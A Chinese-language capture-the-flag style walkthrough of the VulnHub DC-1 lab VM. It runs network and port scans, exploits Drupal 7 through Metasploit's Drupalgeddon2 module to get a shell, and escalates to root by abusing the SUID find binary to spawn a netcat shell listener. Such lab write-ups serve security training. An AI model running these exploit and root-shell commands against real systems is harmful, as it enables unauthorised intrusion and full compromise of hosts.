VulnHub靶機系列:DC-1
阿新 • • 發佈:2020-08-05
1.前言
靶機地址:https://www.vulnhub.com/entry/dc-1,292/
Filename: DC-1.zip
File size: 733 MB
MD5: D052D37F7C819A2B5488FE2BFF4571D8
SHA1: BDDCADF7E8CFA1FF8BE04E446886EAD50B33761D
DHCP service: Enabled
IP address: Automatically assign
2.環境搭建
使用VMware執行虛擬機器,設定為橋接模式即可讓靶機進入主機的網路環境。
如果靶機無法獲取ip地址,請檢視注1
3.滲透測試
3.1 主機探測
3.1.1 fping 主機探測
u@u:~$ fping -aqg 192.168.0.0/24
192.168.0.1
192.168.0.104
192.168.0.107
192.168.0.119
192.168.0.109
192.168.0.199
3.1.2 nmap 主機探測
u@u:~$ nmap -sP 192.168.0.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 17:39 CST Nmap scan report for _gateway (192.168.0.1) Host is up (0.0012s latency). Nmap scan report for 192.168.0.107 Host is up (0.028s latency). Nmap scan report for 192.168.0.109 Host is up (0.049s latency). Nmap scan report for 192.168.0.119 Host is up (0.00065s latency). Nmap scan report for u (192.168.0.199) Host is up (0.0011s latency). Nmap done: 256 IP addresses (5 hosts up) scanned in 13.04 seconds
3.1.3 netdiscover 主機探測
Currently scanning: 192.168.205.0/16 | Screen View: Unique Hosts 60 Captured ARP Req/Rep packets, from 4 hosts. Total size: 3600 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.0.1 xx:xx:xx:xx:xx:xx 4 240 192.168.0.104 xx:xx:xx:xx:xx:xx 12 720 192.168.0.119 xx:xx:xx:xx:xx:xx 9 540 192.168.0.107 xx:xx:xx:xx:xx:xx 35 2100
可以以靶機的開/關狀態的探測結果做對比,新增的探測出的IP即為靶機IP
3.2 埠服務掃描
nmap -v -A -sS -Pn -T4 -p 1-65535 <ip>
掃描結果如下
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 18:03 CST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating ARP Ping Scan at 18:03
Scanning 192.168.0.119 [1 port]
Completed ARP Ping Scan at 18:03, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:03
Completed Parallel DNS resolution of 1 host. at 18:03, 0.06s elapsed
Initiating SYN Stealth Scan at 18:03
Scanning 192.168.0.119 [65535 ports]
Discovered open port 111/tcp on 192.168.0.119
Discovered open port 22/tcp on 192.168.0.119
Discovered open port 80/tcp on 192.168.0.119
Discovered open port 56922/tcp on 192.168.0.119
Completed SYN Stealth Scan at 18:03, 1.79s elapsed (65535 total ports)
Initiating Service scan at 18:03
Scanning 4 services on 192.168.0.119
Completed Service scan at 18:03, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.119
NSE: Script scanning 192.168.0.119.
Initiating NSE at 18:03
Completed NSE at 18:03, 1.92s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.14s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Nmap scan report for 192.168.0.119
Host is up (0.00038s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
u@u:~/Desktop$ cat result
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 18:03 CST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating ARP Ping Scan at 18:03
Scanning 192.168.0.119 [1 port]
Completed ARP Ping Scan at 18:03, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:03
Completed Parallel DNS resolution of 1 host. at 18:03, 0.06s elapsed
Initiating SYN Stealth Scan at 18:03
Scanning 192.168.0.119 [65535 ports]
Discovered open port 111/tcp on 192.168.0.119
Discovered open port 22/tcp on 192.168.0.119
Discovered open port 80/tcp on 192.168.0.119
Discovered open port 56922/tcp on 192.168.0.119
Completed SYN Stealth Scan at 18:03, 1.79s elapsed (65535 total ports)
Initiating Service scan at 18:03
Scanning 4 services on 192.168.0.119
Completed Service scan at 18:03, 11.02s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.119
NSE: Script scanning 192.168.0.119.
Initiating NSE at 18:03
Completed NSE at 18:03, 1.92s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.14s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Nmap scan report for 192.168.0.119
Host is up (0.00038s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37336/udp6 status
| 100024 1 42536/udp status
| 100024 1 56922/tcp status
|_ 100024 1 58809/tcp6 status
56922/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:B8:E1:00 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Uptime guess: 0.014 days (since Tue Aug 4 17:43:41 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.0.119
NSE: Script Post-scanning.
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Initiating NSE at 18:03
Completed NSE at 18:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
| port | state | service | version |
|---|---|---|---|
| 22/tcp | open | ssh | OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) |
| 80/tcp | open | http | Apache httpd 2.2.22 ((Debian))/Drupal 7 |
| 111/tcp | open | rpcbind | 2-4 (RPC #100000) |
| 56922/tcp | open | status | 1 (RPC #100024) |
3.3 Web資訊收集
u@u:~$ whatweb 192.168.0.119
/usr/lib/ruby/vendor_ruby/target.rb:188: warning: URI.escape is obsolete
http://192.168.0.119 [200 OK] Apache[2.2.22],
Content-Language[en],
Country[RESERVED][ZZ],
Drupal,
HTTPServer[Debian Linux][Apache/2.2.22 (Debian)],
IP[192.168.0.119],
JQuery,
MetaGenerator[Drupal 7 (http://drupal.org)],
PHP[5.4.45-0+deb7u14],
PasswordField[pass],
Script[text/javascript],
Title[Welcome to Drupal Site | Drupal Site],
UncommonHeaders[x-generator],
X-Powered-By[PHP/5.4.45-0+deb7u14]
3.4 搜尋 Drupal 7 的漏洞
msf5 > search drupal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
1 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
4 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
5 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
6 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
Interact with a module by name or index, for example use 7 or use exploit/unix/webapp/php_xmlrpc_eval
msf5 > info exploit/unix/webapp/drupal_drupalgeddon2
Name: Drupal Drupalgeddon 2 Forms API Property Injection
Module: exploit/unix/webapp/drupal_drupalgeddon2
Platform: PHP, Unix, Linux
Arch: php, cmd, x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2018-03-28
Provided by:
Jasper Mattsson
a2u
Nixawk
FireFart
wvu <[email protected]>
Available targets:
Id Name
-- ----
0 Automatic (PHP In-Memory)
1 Automatic (PHP Dropper)
2 Automatic (Unix In-Memory)
3 Automatic (Linux Dropper)
4 Drupal 7.x (PHP In-Memory)
5 Drupal 7.x (PHP Dropper)
6 Drupal 7.x (Unix In-Memory)
7 Drupal 7.x (Linux Dropper)
8 Drupal 8.x (PHP In-Memory)
9 Drupal 8.x (PHP Dropper)
10 Drupal 8.x (Unix In-Memory)
11 Drupal 8.x (Linux Dropper)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload information:
Avoid: 3 characters
Description:
This module exploits a Drupal property injection in the Forms API.
Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are
vulnerable.
References:
https://cvedetails.com/cve/CVE-2018-7600/
https://www.drupal.org/sa-core-2018-002
https://greysec.net/showthread.php?tid=2912
https://research.checkpoint.com/uncovering-drupalgeddon-2/
https://github.com/a2u/CVE-2018-7600
https://github.com/nixawk/labs/issues/19
https://github.com/FireFart/CVE-2018-7600
Also known as:
SA-CORE-2018-002
Drupalgeddon 2
3.5 使用msfconsole利用漏洞
msf5 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOST 192.168.0.119
RHOST => 192.168.0.119
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > SET LHOST 192.168.0.199
[-] Unknown command: SET.
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 192.168.0.199
LHOST => 192.168.0.199
msf5 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
[*] Started bind TCP handler against 192.168.0.119:8080
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.0.119:8080) at 2020-08-05 09:15:35 +0800
ls
COPYRIGHT.txt
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt
README.txt
UPGRADE.txt
authorize.php
cron.php
flag1.txt
includes
index.php
install.php
misc
modules
profiles
robots.txt
scripts
sites
themes
update.php
web.config
xmlrpc.php
這裡如果options的屬性沒填寫錯,卻一直無法攻擊成功,可以嘗試一下更換payload。
3.6 提權
3.6.1 find SUID提權
meterpreter > shell
Process 3454 created.
Channel 4 created.
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
這裡find擁有SUID許可權,因此可以使用find命令進行提權
cd /tmp
touch a
find a -exec whoami \;
root
因為靶機中有netcat,所以可以直接
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
listening on [any] 5555 ...
u@u:~$ nc 192.168.0.119 5555
whoami
root
python -c "import pty;pty.spawn('/bin/sh')"
# whoami
whoami
root